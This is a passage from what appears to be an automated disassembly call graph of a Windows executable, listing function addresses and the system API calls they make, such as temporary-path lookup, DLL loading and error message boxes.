GetModuleHandleW 16411->16540 16412 7ff6ba3a391b 16756 7ff6ba3a45c0 16412->16756 16413 7ff6ba3a383c 16747 7ff6ba3a1c80 16413->16747 16416 7ff6ba3a385b 16659 7ff6ba3a8830 16416->16659 16419 7ff6ba3a396a 16779 7ff6ba3a2710 16419->16779 16420 7ff6ba3a388e 16430 7ff6ba3a38bb __std_exception_copy 16420->16430 16751 7ff6ba3a89a0 16420->16751 16423 7ff6ba3a395d 16424 7ff6ba3a3962 16423->16424 16425 7ff6ba3a3984 16423->16425 16775 7ff6ba3b004c 16424->16775 16426 7ff6ba3a1c80 49 API calls 16425->16426 16429 7ff6ba3a39a3 16426->16429 16434 7ff6ba3a1950 115 API calls 16429->16434 16431 7ff6ba3a8830 14 API calls 16430->16431 16438 7ff6ba3a38de __std_exception_copy 16430->16438 16431->16438 16433 7ff6ba3a3a0b 16435 7ff6ba3a89a0 40 API calls 16433->16435 16437 7ff6ba3a39ce 16434->16437 16436 7ff6ba3a3a17 16435->16436 16439 7ff6ba3a89a0 40 API calls 16436->16439 16437->16416 16440 7ff6ba3a39de 16437->16440 16444 7ff6ba3a390e __std_exception_copy 16438->16444 16790 7ff6ba3a8940 16438->16790 16441 7ff6ba3a3a23 16439->16441 16442 7ff6ba3a2710 54 API calls 16440->16442 16443 7ff6ba3a89a0 40 API calls 16441->16443 16442->16407 16443->16444 16445 7ff6ba3a8830 14 API calls 16444->16445 16446 7ff6ba3a3a3b 16445->16446 16447 7ff6ba3a3b2f 16446->16447 16448 7ff6ba3a3a60 __std_exception_copy 16446->16448 16449 7ff6ba3a2710 54 API calls 16447->16449 16450 7ff6ba3a8940 40 API calls 16448->16450 16452 7ff6ba3a3aab 16448->16452 16449->16407 16450->16452 16451 7ff6ba3a8830 14 API calls 16453 7ff6ba3a3bf4 __std_exception_copy 16451->16453 16452->16451 16454 7ff6ba3a3d41 16453->16454 16455 7ff6ba3a3c46 16453->16455 16797 7ff6ba3a44e0 16454->16797 16456 7ff6ba3a3c50 16455->16456 16457 7ff6ba3a3cd4 16455->16457 16672 7ff6ba3a90e0 16456->16672 16460 7ff6ba3a8830 14 API calls 16457->16460 16465 7ff6ba3a3ce0 16460->16465 16461 7ff6ba3a3d4f 16462 7ff6ba3a3d71 16461->16462 16463 7ff6ba3a3d65 16461->16463 16468 7ff6ba3a1c80 49 API calls 16462->16468 16800 7ff6ba3a4630 16463->16800 16466 7ff6ba3a3c61 16465->16466 16469 7ff6ba3a3ced 16465->16469 16471 7ff6ba3a2710 54 API calls 16466->16471 16478 7ff6ba3a3cc8 __std_exception_copy 16468->16478 16472 7ff6ba3a1c80 49 API calls 16469->16472 16471->16407 16475 7ff6ba3a3d0b 16472->16475 16473 7ff6ba3a3dc4 16722 7ff6ba3a9390 16473->16722 16477 7ff6ba3a3d12 16475->16477 16475->16478 16481 7ff6ba3a2710 54 API calls 16477->16481 16478->16473 16479 7ff6ba3a3da7 SetDllDirectoryW LoadLibraryExW 16478->16479 16479->16473 16480 7ff6ba3a3dd7 SetDllDirectoryW 16483 7ff6ba3a3e0a 16480->16483 16524 7ff6ba3a3e5a 16480->16524 16481->16407 16484 7ff6ba3a8830 14 API calls 16483->16484 16492 7ff6ba3a3e16 __std_exception_copy 16484->16492 16485 7ff6ba3a4008 16487 7ff6ba3a4012 PostMessageW GetMessageW 16485->16487 16488 7ff6ba3a4035 16485->16488 16486 7ff6ba3a3f1b 16727 7ff6ba3a33c0 16486->16727 16487->16488 16877 7ff6ba3a3360 16488->16877 16494 7ff6ba3a3ef2 16492->16494 16499 7ff6ba3a3e4e 16492->16499 16498 7ff6ba3a8940 40 API calls 16494->16498 16498->16524 16499->16524 16803 7ff6ba3a6dc0 16499->16803 16504 7ff6ba3a6fc0 FreeLibrary 16506 7ff6ba3a405b 16504->16506 16512 7ff6ba3a3e81 16515 7ff6ba3a3ea2 16512->16515 16526 7ff6ba3a3e85 16512->16526 16824 7ff6ba3a6e00 16512->16824 16515->16526 16843 7ff6ba3a71b0 16515->16843 16524->16485 16524->16486 16526->16524 16859 7ff6ba3a2a50 16526->16859 16536 7ff6ba3b9b64 16535->16536 16537 7ff6ba3b9b43 16535->16537 16538 7ff6ba3ba3d8 45 API calls 16536->16538 16537->16381 16539 7ff6ba3b9b69 16538->16539 16541 7ff6ba3ad2c9 16540->16541 16541->16389 16544 7ff6ba3acfa1 16542->16544 16543 7ff6ba3acd60 16543->16379 16544->16543 16545 7ff6ba3ad888 7 API calls 16544->16545 16545->16543 16547 7ff6ba3ad152 _isindst __scrt_get_show_window_mode 16546->16547 16548 7ff6ba3ad171 RtlCaptureContext RtlLookupFunctionEntry 16547->16548 16549 7ff6ba3ad1d6 __scrt_get_show_window_mode 16548->16549 16550 7ff6ba3ad19a RtlVirtualUnwind 16548->16550 16551 7ff6ba3ad208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16549->16551 16550->16549 16552 7ff6ba3ad256 _isindst 16551->16552 16552->16377 16554 7ff6ba3ad890 16553->16554 16555 7ff6ba3ad89a 16553->16555 16559 7ff6ba3adc24 16554->16559 16555->16395 16560 7ff6ba3ad895 16559->16560 16561 7ff6ba3adc33 16559->16561 16563 7ff6ba3adc90 16560->16563 16567 7ff6ba3ade60 16561->16567 16564 7ff6ba3adcbb 16563->16564 16565 7ff6ba3adc9e DeleteCriticalSection 16564->16565 16566 7ff6ba3adcbf 16564->16566 16565->16564 16566->16555 16571 7ff6ba3adcc8 16567->16571 16572 7ff6ba3addb2 TlsFree 16571->16572 16577 7ff6ba3add0c __vcrt_FlsAlloc 16571->16577 16573 7ff6ba3add3a LoadLibraryExW 16575 7ff6ba3addd9 16573->16575 16576 7ff6ba3add5b GetLastError 16573->16576 16574 7ff6ba3addf9 GetProcAddress 16574->16572 16575->16574 16578 7ff6ba3addf0 FreeLibrary 16575->16578 16576->16577 16577->16572 16577->16573 16577->16574 16579 7ff6ba3add7d LoadLibraryExW 16577->16579 16578->16574 16579->16575 16579->16577 16583 7ff6ba3bf480 16580->16583 16581 7ff6ba3bf4d3 16582 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 16581->16582 16586 7ff6ba3bf4fc 16582->16586 16583->16581 16584 7ff6ba3bf526 16583->16584 16890 7ff6ba3bf358 16584->16890 16586->16404 16898 7ff6ba3ac850 16587->16898 16590 7ff6ba3a3710 16900 7ff6ba3a9280 FindFirstFileExW 16590->16900 16591 7ff6ba3a36eb GetLastError 16905 7ff6ba3a2c50 16591->16905 16594 7ff6ba3a3706 16599 7ff6ba3ac550 _log10_special 8 API calls 16594->16599 16596 7ff6ba3a3723 16920 7ff6ba3a9300 CreateFileW 16596->16920 16597 7ff6ba3a377d 16931 7ff6ba3a9440 16597->16931 16602 7ff6ba3a37b5 16599->16602 16601 7ff6ba3a378b 16601->16594 16606 7ff6ba3a2810 49 API calls 16601->16606 16602->16407 16609 7ff6ba3a1950 16602->16609 16604 7ff6ba3a3734 16923 7ff6ba3a2810 16604->16923 16605 7ff6ba3a374c __vcrt_FlsAlloc 16605->16597 16606->16594 16610 7ff6ba3a45c0 108 API calls 16609->16610 16611 7ff6ba3a1985 16610->16611 16612 7ff6ba3a1c43 16611->16612 16613 7ff6ba3a7f90 83 API calls 16611->16613 16614 7ff6ba3ac550 _log10_special 8 API calls 16612->16614 16615 7ff6ba3a19cb 16613->16615 16616 7ff6ba3a1c5e 16614->16616 16658 7ff6ba3a1a03 16615->16658 17288 7ff6ba3b06d4 16615->17288 16616->16412 16616->16413 16618 7ff6ba3b004c 74 API calls 16618->16612 16619 7ff6ba3a19e5 16620 7ff6ba3a19e9 16619->16620 16621 7ff6ba3a1a08 16619->16621 16622 7ff6ba3b4f08 _get_daylight 11 API calls 16620->16622 17292 7ff6ba3b039c 16621->17292 16624 7ff6ba3a19ee 16622->16624 17295 7ff6ba3a2910 16624->17295 16627 7ff6ba3a1a45 16632 7ff6ba3a1a7b 16627->16632 16633 7ff6ba3a1a5c 16627->16633 16628 7ff6ba3a1a26 16629 7ff6ba3b4f08 _get_daylight 11 API calls 16628->16629 16630 7ff6ba3a1a2b 16629->16630 16631 7ff6ba3a2910 54 API calls 16630->16631 16631->16658 16635 7ff6ba3a1c80 49 API calls 16632->16635 16634 7ff6ba3b4f08 _get_daylight 11 API calls 16633->16634 16636 7ff6ba3a1a61 16634->16636 16637 7ff6ba3a1a92 16635->16637 16638 7ff6ba3a2910 54 API calls 16636->16638 16639 7ff6ba3a1c80 49 API calls 16637->16639 16638->16658 16640 7ff6ba3a1add 16639->16640 16641 7ff6ba3b06d4 73 API calls 16640->16641 16642 7ff6ba3a1b01 16641->16642 16643 7ff6ba3a1b35 16642->16643 16644 7ff6ba3a1b16 16642->16644 16646 7ff6ba3b039c _fread_nolock 53 API calls 16643->16646 16645 7ff6ba3b4f08 _get_daylight 11 API calls 16644->16645 16647 7ff6ba3a1b1b 16645->16647 16648 7ff6ba3a1b4a 16646->16648 16649 7ff6ba3a2910 54 API calls 16647->16649 16650 7ff6ba3a1b6f 16648->16650 16651 7ff6ba3a1b50 16648->16651 16649->16658 17310 7ff6ba3b0110 16650->17310 16653 7ff6ba3b4f08 _get_daylight 11 API calls 16651->16653 16655 7ff6ba3a1b55 16653->16655 16656 7ff6ba3a2910 54 API calls 16655->16656 16656->16658 16657 7ff6ba3a2710 54 API calls 16657->16658 16658->16618 16660 7ff6ba3a883a 16659->16660 16661 7ff6ba3a9390 2 API calls 16660->16661 16662 7ff6ba3a8859 GetEnvironmentVariableW 16661->16662 16663 7ff6ba3a88c2 16662->16663 16664 7ff6ba3a8876 ExpandEnvironmentStringsW 16662->16664 16665 7ff6ba3ac550 _log10_special 8 API calls 16663->16665 16664->16663 16666 7ff6ba3a8898 16664->16666 16667 7ff6ba3a88d4 16665->16667 16668 7ff6ba3a9440 2 API calls 16666->16668 16667->16420 16669 7ff6ba3a88aa 16668->16669 16670 7ff6ba3ac550 _log10_special 8 API calls 16669->16670 16671 7ff6ba3a88ba 16670->16671 16671->16420 16673 7ff6ba3a90f5 16672->16673 17528 7ff6ba3a8570 GetCurrentProcess OpenProcessToken 16673->17528 16676 7ff6ba3a8570 7 API calls 16677 7ff6ba3a9121 16676->16677 16678 7ff6ba3a9154 16677->16678 16679 7ff6ba3a913a 16677->16679 16681 7ff6ba3a26b0 48 API calls 16678->16681 16680 7ff6ba3a26b0 48 API calls 16679->16680 16682 7ff6ba3a9152 16680->16682 16683 7ff6ba3a9167 LocalFree LocalFree 16681->16683 16682->16683 16684 7ff6ba3a9183 16683->16684 16686 7ff6ba3a918f 16683->16686 17538 7ff6ba3a2b50 16684->17538 16687 7ff6ba3ac550 _log10_special 8 API calls 16686->16687 16688 7ff6ba3a3c55 16687->16688 16688->16466 16689 7ff6ba3a8660 16688->16689 16690 7ff6ba3a8678 16689->16690 16691 7ff6ba3a869c 16690->16691 16692 7ff6ba3a86fa GetTempPathW GetCurrentProcessId 16690->16692 16694 7ff6ba3a8830 14 API calls 16691->16694 17547 7ff6ba3a25c0 16692->17547 16695 7ff6ba3a86a8 16694->16695 17554 7ff6ba3a81d0 16695->17554 16700 7ff6ba3a86e8 __std_exception_copy 16721 7ff6ba3a87d4 __std_exception_copy 16700->16721 16701 7ff6ba3a8728 __std_exception_copy 16711 7ff6ba3a8765 __std_exception_copy 16701->16711 17551 7ff6ba3b8b68 16701->17551 16704 7ff6ba3a86ce __std_exception_copy 16704->16692 16710 7ff6ba3a86dc 16704->16710 16707 7ff6ba3ac550 _log10_special 8 API calls 16709 7ff6ba3a3cbb 16707->16709 16709->16466 16709->16478 16712 7ff6ba3a2810 49 API calls 16710->16712 16713 7ff6ba3a9390 2 API calls 16711->16713 16711->16721 16712->16700 16714 7ff6ba3a87b1 16713->16714 16715 7ff6ba3a87e9 16714->16715 16716 7ff6ba3a87b6 16714->16716 16717 7ff6ba3b8238 38 API calls 16715->16717 16718 7ff6ba3a9390 2 API calls 16716->16718 16717->16721 16719 7ff6ba3a87c6 16718->16719 16720 7ff6ba3b8238 38 API calls 16719->16720 16720->16721 16721->16707 16723 7ff6ba3a93b2 MultiByteToWideChar 16722->16723 16724 7ff6ba3a93d6 16722->16724 16723->16724 16726 7ff6ba3a93ec __std_exception_copy 16723->16726 16725 7ff6ba3a93f3 MultiByteToWideChar 16724->16725 16724->16726 16725->16726 16726->16480 16737 7ff6ba3a33ce __scrt_get_show_window_mode 16727->16737 16728 7ff6ba3a35c7 16729 7ff6ba3ac550 _log10_special 8 API calls 16728->16729 16730 7ff6ba3a3664 16729->16730 16730->16407 16746 7ff6ba3a90c0 LocalFree 16730->16746 16732 7ff6ba3a1c80 49 API calls 16732->16737 16733 7ff6ba3a35e2 16735 7ff6ba3a2710 54 API calls 16733->16735 16735->16728 16737->16728 16737->16732 16737->16733 16738 7ff6ba3a35c9 16737->16738 16740 7ff6ba3a2a50 54 API calls 16737->16740 16744 7ff6ba3a35d0 16737->16744 17743 7ff6ba3a4560 16737->17743 17749 7ff6ba3a7e20 16737->17749 17761 7ff6ba3a1600 16737->17761 17809 7ff6ba3a7120 16737->17809 17813 7ff6ba3a4190 16737->17813 17857 7ff6ba3a4450 16737->17857 16741 7ff6ba3a2710 54 API calls 16738->16741 16740->16737 16741->16728 16745 7ff6ba3a2710 54 API calls 16744->16745 16745->16728 16748 7ff6ba3a1ca5 16747->16748 16749 7ff6ba3b4984 49 API calls 16748->16749 16750 7ff6ba3a1cc8 16749->16750 16750->16416 16752 7ff6ba3a9390 2 API calls 16751->16752 16753 7ff6ba3a89b4 16752->16753 16754 7ff6ba3b8238 38 API calls 16753->16754 16755 7ff6ba3a89c6 __std_exception_copy 16754->16755 16755->16430 16757 7ff6ba3a45cc 16756->16757 16758 7ff6ba3a9390 2 API calls 16757->16758 16759 7ff6ba3a45f4 16758->16759 16760 7ff6ba3a9390 2 API calls 16759->16760 16761 7ff6ba3a4607 16760->16761 18024 7ff6ba3b5f94 16761->18024 16764 7ff6ba3ac550 _log10_special 8 API calls 16765 7ff6ba3a392b 16764->16765 16765->16419 16766 7ff6ba3a7f90 16765->16766 16767 7ff6ba3a7fb4 16766->16767 16768 7ff6ba3b06d4 73 API calls 16767->16768 16773 7ff6ba3a808b __std_exception_copy 16767->16773 16769 7ff6ba3a7fd0 16768->16769 16769->16773 18416 7ff6ba3b78c8 16769->18416 16771 7ff6ba3b06d4 73 API calls 16774 7ff6ba3a7fe5 16771->16774 16772 7ff6ba3b039c _fread_nolock 53 API calls 16772->16774 16773->16423 16774->16771 16774->16772 16774->16773 16776 7ff6ba3b007c 16775->16776 18431 7ff6ba3afe28 16776->18431 16778 7ff6ba3b0095 16778->16419 16780 7ff6ba3ac850 16779->16780 16781 7ff6ba3a2734 GetCurrentProcessId 16780->16781 16782 7ff6ba3a1c80 49 API calls 16781->16782 16783 7ff6ba3a2787 16782->16783 16784 7ff6ba3b4984 49 API calls 16783->16784 16785 7ff6ba3a27cf 16784->16785 16786 7ff6ba3a2620 12 API calls 16785->16786 16787 7ff6ba3a27f1 16786->16787 16788 7ff6ba3ac550 _log10_special 8 API calls 16787->16788 16789 7ff6ba3a2801 16788->16789 16789->16407 16791 7ff6ba3a9390 2 API calls 16790->16791 16792 7ff6ba3a895c 16791->16792 16793 7ff6ba3a9390 2 API calls 16792->16793 16794 7ff6ba3a896c 16793->16794 16795 7ff6ba3b8238 38 API calls 16794->16795 16796 7ff6ba3a897a __std_exception_copy 16795->16796 16796->16433 16798 7ff6ba3a1c80 49 API calls 16797->16798 16799 7ff6ba3a44fd 16798->16799 16799->16461 16801 7ff6ba3a1c80 49 API calls 16800->16801 16802 7ff6ba3a4660 16801->16802 16802->16478 16802->16802 16804 7ff6ba3a6dd5 16803->16804 16805 7ff6ba3a3e6c 16804->16805 16806 7ff6ba3b4f08 _get_daylight 11 API calls 16804->16806 16809 7ff6ba3a7340 16805->16809 16807 7ff6ba3a6de2 16806->16807 16808 7ff6ba3a2910 54 API calls 16807->16808 16808->16805 18442 7ff6ba3a1470 16809->18442 16811 7ff6ba3a7368 16812 7ff6ba3a74b9 __std_exception_copy 16811->16812 16813 7ff6ba3a4630 49 API calls 16811->16813 16812->16512 16814 7ff6ba3a738a 16813->16814 16815 7ff6ba3a738f 16814->16815 16816 7ff6ba3a4630 49 API calls 16814->16816 16818 7ff6ba3a2a50 54 API calls 16815->16818 16817 7ff6ba3a73ae 16816->16817 16817->16815 16819 7ff6ba3a4630 49 API calls 16817->16819 16818->16812 16820 7ff6ba3a73ca 16819->16820 16820->16815 16821 7ff6ba3a73d3 16820->16821 16822 7ff6ba3a2710 54 API calls 16821->16822 16823 7ff6ba3a7443 __std_exception_copy memcpy_s 16821->16823 16822->16812 16823->16512 16840 7ff6ba3a6e1c 16824->16840 16825 7ff6ba3a6f3f 16826 7ff6ba3ac550 _log10_special 8 API calls 16825->16826 16828 7ff6ba3a6f51 16826->16828 16827 7ff6ba3a1840 45 API calls 16827->16840 16828->16515 16829 7ff6ba3a6faa 16831 7ff6ba3a2710 54 API calls 16829->16831 16830 7ff6ba3a1c80 49 API calls 16830->16840 16831->16825 16832 7ff6ba3a6f97 16833 7ff6ba3a2710 54 API calls 16832->16833 16833->16825 16834 7ff6ba3a4560 10 API calls 16834->16840 16835 7ff6ba3a7e20 52 API calls 16835->16840 16836 7ff6ba3a2a50 54 API calls 16836->16840 16837 7ff6ba3a6f84 16838 7ff6ba3a2710 54 API calls 16837->16838 16838->16825 16839 7ff6ba3a1600 118 API calls 16839->16840 16840->16825 16840->16827 16840->16829 16840->16830 16840->16832 16840->16834 16840->16835 16840->16836 16840->16837 16840->16839 16841 7ff6ba3a6f6d 16840->16841 16842 7ff6ba3a2710 54 API calls 16841->16842 16842->16825 18472 7ff6ba3a8e80 16843->18472 16845 7ff6ba3a71c9 16846 7ff6ba3a8e80 3 API calls 16845->16846 16847 7ff6ba3a71dc 16846->16847 16848 7ff6ba3a720f 16847->16848 16849 7ff6ba3a71f4 16847->16849 16850 7ff6ba3a2710 54 API calls 16848->16850 18476 7ff6ba3a76c0 GetProcAddress 16849->18476 16852 7ff6ba3a3eb7 16850->16852 16852->16526 16860 7ff6ba3ac850 16859->16860 16861 7ff6ba3a2a74 GetCurrentProcessId 16860->16861 16862 7ff6ba3a1c80 49 API calls 16861->16862 16863 7ff6ba3a2ac7 16862->16863 16864 7ff6ba3b4984 49 API calls 16863->16864 16865 7ff6ba3a2b0f 16864->16865 16866 7ff6ba3a2620 12 API calls 16865->16866 16867 7ff6ba3a2b31 16866->16867 16868 7ff6ba3ac550 _log10_special 8 API calls 16867->16868 16869 7ff6ba3a2b41 16868->16869 18548 7ff6ba3a6360 16877->18548 16881 7ff6ba3a3381 16885 7ff6ba3a3399 16881->16885 18616 7ff6ba3a6050 16881->18616 16883 7ff6ba3a338d 16883->16885 18625 7ff6ba3a61e0 16883->18625 16886 7ff6ba3a3670 16885->16886 16887 7ff6ba3a367e 16886->16887 16888 7ff6ba3a368f 16887->16888 18836 7ff6ba3a8e60 FreeLibrary 16887->18836 16888->16504 16897 7ff6ba3b546c EnterCriticalSection 16890->16897 16899 7ff6ba3a36bc GetModuleFileNameW 16898->16899 16899->16590 16899->16591 16901 7ff6ba3a92d2 16900->16901 16902 7ff6ba3a92bf FindClose 16900->16902 16903 7ff6ba3ac550 _log10_special 8 API calls 16901->16903 16902->16901 16904 7ff6ba3a371a 16903->16904 16904->16596 16904->16597 16906 7ff6ba3ac850 16905->16906 16907 7ff6ba3a2c70 GetCurrentProcessId 16906->16907 16936 7ff6ba3a26b0 16907->16936 16909 7ff6ba3a2cb9 16940 7ff6ba3b4bd8 16909->16940 16912 7ff6ba3a26b0 48 API calls 16913 7ff6ba3a2d34 FormatMessageW 16912->16913 16915 7ff6ba3a2d7f MessageBoxW 16913->16915 16916 7ff6ba3a2d6d 16913->16916 16918 7ff6ba3ac550 _log10_special 8 API calls 16915->16918 16917 7ff6ba3a26b0 48 API calls 16916->16917 16917->16915 16919 7ff6ba3a2daf 16918->16919 16919->16594 16921 7ff6ba3a9340 GetFinalPathNameByHandleW CloseHandle 16920->16921 16922 7ff6ba3a3730 16920->16922 16921->16922 16922->16604 16922->16605 16924 7ff6ba3a2834 16923->16924 16925 7ff6ba3a26b0 48 API calls 16924->16925 16926 7ff6ba3a2887 16925->16926 16927 7ff6ba3b4bd8 48 API calls 16926->16927 16928 7ff6ba3a28d0 MessageBoxW 16927->16928 16929 7ff6ba3ac550 _log10_special 8 API calls 16928->16929 16930 7ff6ba3a2900 16929->16930 16930->16594 16932 7ff6ba3a9495 16931->16932 16933 7ff6ba3a946a WideCharToMultiByte 16931->16933 16934 7ff6ba3a94b2 WideCharToMultiByte 16932->16934 16935 7ff6ba3a94ab __std_exception_copy 16932->16935 16933->16932 16933->16935 16934->16935 16935->16601 16937 7ff6ba3a26d5 16936->16937 16938 7ff6ba3b4bd8 48 API calls 16937->16938 16939 7ff6ba3a26f8 16938->16939 16939->16909 16941 7ff6ba3b4c32 16940->16941 16942 7ff6ba3b4c57 16941->16942 16944 7ff6ba3b4c93 16941->16944 16943 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 16942->16943 16946 7ff6ba3b4c81 16943->16946 16958 7ff6ba3b2f90 16944->16958 16948 7ff6ba3ac550 _log10_special 8 API calls 16946->16948 16947 7ff6ba3b4d40 16955 7ff6ba3b4d74 16947->16955 16957 7ff6ba3b4d49 16947->16957 16951 7ff6ba3a2d04 16948->16951 16949 7ff6ba3ba948 __free_lconv_mon 11 API calls 16949->16946 16951->16912 16952 7ff6ba3b4d9a 16953 7ff6ba3b4da4 16952->16953 16952->16955 16956 7ff6ba3ba948 __free_lconv_mon 11 API calls 16953->16956 16954 7ff6ba3ba948 __free_lconv_mon 11 API calls 16954->16946 16955->16949 16956->16946 16957->16954 16959 7ff6ba3b2fce 16958->16959 16960 7ff6ba3b2fbe 16958->16960 16961 7ff6ba3b2fd7 16959->16961 16966 7ff6ba3b3005 16959->16966 16962 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 16960->16962 16963 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 16961->16963 16964 7ff6ba3b2ffd 16962->16964 16963->16964 16964->16947 16964->16952 16964->16955 16964->16957 16966->16960 16966->16964 16969 7ff6ba3b39a4 16966->16969 17002 7ff6ba3b33f0 16966->17002 17039 7ff6ba3b2b80 16966->17039 16970 7ff6ba3b39e6 16969->16970 16971 7ff6ba3b3a57 16969->16971 16972 7ff6ba3b3a81 16970->16972 16973 7ff6ba3b39ec 16970->16973 16974 7ff6ba3b3ab0 16971->16974 16975 7ff6ba3b3a5c 16971->16975 17062 7ff6ba3b1d54 16972->17062 16976 7ff6ba3b3a20 16973->16976 16977 7ff6ba3b39f1 16973->16977 16981 7ff6ba3b3ac7 16974->16981 16983 7ff6ba3b3aba 16974->16983 16987 7ff6ba3b3abf 16974->16987 16978 7ff6ba3b3a91 16975->16978 16979 7ff6ba3b3a5e 16975->16979 16984 7ff6ba3b39f7 16976->16984 16976->16987 16977->16981 16977->16984 17069 7ff6ba3b1944 16978->17069 16982 7ff6ba3b3a00 16979->16982 16991 7ff6ba3b3a6d 16979->16991 17076 7ff6ba3b46ac 16981->17076 17000 7ff6ba3b3af0 16982->17000 17042 7ff6ba3b4158 16982->17042 16983->16972 16983->16987 16984->16982 16990 7ff6ba3b3a32 16984->16990 16997 7ff6ba3b3a1b 16984->16997 16987->17000 17080 7ff6ba3b2164 16987->17080 16990->17000 17052 7ff6ba3b4494 16990->17052 16991->16972 16993 7ff6ba3b3a72 16991->16993 16993->17000 17058 7ff6ba3b4558 16993->17058 16994 7ff6ba3ac550 _log10_special 8 API calls 16995 7ff6ba3b3dea 16994->16995 16995->16966 16997->17000 17001 7ff6ba3b3cdc 16997->17001 17087 7ff6ba3b47c0 16997->17087 17000->16994 17001->17000 17093 7ff6ba3bea08 17001->17093 17003 7ff6ba3b33fe 17002->17003 17004 7ff6ba3b3414 17002->17004 17005 7ff6ba3b39e6 17003->17005 17006 7ff6ba3b3a57 17003->17006 17008 7ff6ba3b3454 17003->17008 17007 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17004->17007 17004->17008 17009 7ff6ba3b3a81 17005->17009 17010 7ff6ba3b39ec 17005->17010 17011 7ff6ba3b3ab0 17006->17011 17012 7ff6ba3b3a5c 17006->17012 17007->17008 17008->16966 17017 7ff6ba3b1d54 38 API calls 17009->17017 17013 7ff6ba3b3a20 17010->17013 17014 7ff6ba3b39f1 17010->17014 17018 7ff6ba3b3ac7 17011->17018 17020 7ff6ba3b3aba 17011->17020 17024 7ff6ba3b3abf 17011->17024 17015 7ff6ba3b3a91 17012->17015 17016 7ff6ba3b3a5e 17012->17016 17021 7ff6ba3b39f7 17013->17021 17013->17024 17014->17018 17014->17021 17022 7ff6ba3b1944 38 API calls 17015->17022 17019 7ff6ba3b3a00 17016->17019 17028 7ff6ba3b3a6d 17016->17028 17034 7ff6ba3b3a1b 17017->17034 17025 7ff6ba3b46ac 45 API calls 17018->17025 17023 7ff6ba3b4158 47 API calls 17019->17023 17037 7ff6ba3b3af0 17019->17037 17020->17009 17020->17024 17021->17019 17026 7ff6ba3b3a32 17021->17026 17021->17034 17022->17034 17023->17034 17027 7ff6ba3b2164 38 API calls 17024->17027 17024->17037 17025->17034 17029 7ff6ba3b4494 46 API calls 17026->17029 17026->17037 17027->17034 17028->17009 17030 7ff6ba3b3a72 17028->17030 17029->17034 17033 7ff6ba3b4558 37 API calls 17030->17033 17030->17037 17031 7ff6ba3ac550 _log10_special 8 API calls 17032 7ff6ba3b3dea 17031->17032 17032->16966 17033->17034 17035 7ff6ba3b47c0 45 API calls 17034->17035 17034->17037 17038 7ff6ba3b3cdc 17034->17038 17035->17038 17036 7ff6ba3bea08 46 API calls 17036->17038 17037->17031 17038->17036 17038->17037 17271 7ff6ba3b0fc8 17039->17271 17043 7ff6ba3b417e 17042->17043 17105 7ff6ba3b0b80 17043->17105 17048 7ff6ba3b47c0 45 API calls 17049 7ff6ba3b42c3 17048->17049 17050 7ff6ba3b47c0 45 API calls 17049->17050 17051 7ff6ba3b4351 17049->17051 17050->17051 17051->16997 17053 7ff6ba3b44c9 17052->17053 17054 7ff6ba3b44e7 17053->17054 17055 7ff6ba3b47c0 45 API calls 17053->17055 17057 7ff6ba3b450e 17053->17057 17056 7ff6ba3bea08 46 API calls 17054->17056 17055->17054 17056->17057 17057->16997 17060 7ff6ba3b4579 17058->17060 17059 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17061 7ff6ba3b45aa 17059->17061 17060->17059 17060->17061 17061->16997 17063 7ff6ba3b1d87 17062->17063 17064 7ff6ba3b1db6 17063->17064 17066 7ff6ba3b1e73 17063->17066 17068 7ff6ba3b1df3 17064->17068 17241 7ff6ba3b0c28 17064->17241 17067 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17066->17067 17067->17068 17068->16997 17070 7ff6ba3b1977 17069->17070 17071 7ff6ba3b19a6 17070->17071 17073 7ff6ba3b1a63 17070->17073 17072 7ff6ba3b0c28 12 API calls 17071->17072 17075 7ff6ba3b19e3 17071->17075 17072->17075 17074 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17073->17074 17074->17075 17075->16997 17077 7ff6ba3b46ef 17076->17077 17079 7ff6ba3b46f3 __crtLCMapStringW 17077->17079 17249 7ff6ba3b4748 17077->17249 17079->16997 17081 7ff6ba3b2197 17080->17081 17082 7ff6ba3b21c6 17081->17082 17084 7ff6ba3b2283 17081->17084 17083 7ff6ba3b0c28 12 API calls 17082->17083 17086 7ff6ba3b2203 17082->17086 17083->17086 17085 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17084->17085 17085->17086 17086->16997 17088 7ff6ba3b47d7 17087->17088 17253 7ff6ba3bd9b8 17088->17253 17094 7ff6ba3bea39 17093->17094 17102 7ff6ba3bea47 17093->17102 17095 7ff6ba3bea67 17094->17095 17096 7ff6ba3b47c0 45 API calls 17094->17096 17094->17102 17097 7ff6ba3bea9f 17095->17097 17098 7ff6ba3bea78 17095->17098 17096->17095 17100 7ff6ba3beac9 17097->17100 17101 7ff6ba3beb2a 17097->17101 17097->17102 17261 7ff6ba3c00a0 17098->17261 17100->17102 17264 7ff6ba3bf8a0 17100->17264 17103 7ff6ba3bf8a0 _fread_nolock MultiByteToWideChar 17101->17103 17102->17001 17103->17102 17106 7ff6ba3b0ba6 17105->17106 17107 7ff6ba3b0bb7 17105->17107 17113 7ff6ba3be570 17106->17113 17107->17106 17108 7ff6ba3bd5fc _fread_nolock 12 API calls 17107->17108 17109 7ff6ba3b0be4 17108->17109 17110 7ff6ba3b0bf8 17109->17110 17111 7ff6ba3ba948 __free_lconv_mon 11 API calls 17109->17111 17112 7ff6ba3ba948 __free_lconv_mon 11 API calls 17110->17112 17111->17110 17112->17106 17114 7ff6ba3be5c0 17113->17114 17115 7ff6ba3be58d 17113->17115 17114->17115 17117 7ff6ba3be5f2 17114->17117 17116 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17115->17116 17126 7ff6ba3b42a1 17116->17126 17120 7ff6ba3be705 17117->17120 17130 7ff6ba3be63a 17117->17130 17118 7ff6ba3be7f7 17168 7ff6ba3bda5c 17118->17168 17120->17118 17121 7ff6ba3be7bd 17120->17121 17123 7ff6ba3be78c 17120->17123 17125 7ff6ba3be74f 17120->17125 17127 7ff6ba3be745 17120->17127 17161 7ff6ba3bddf4 17121->17161 17154 7ff6ba3be0d4 17123->17154 17144 7ff6ba3be304 17125->17144 17126->17048 17126->17049 17127->17121 17129 7ff6ba3be74a 17127->17129 17129->17123 17129->17125 17130->17126 17135 7ff6ba3ba4a4 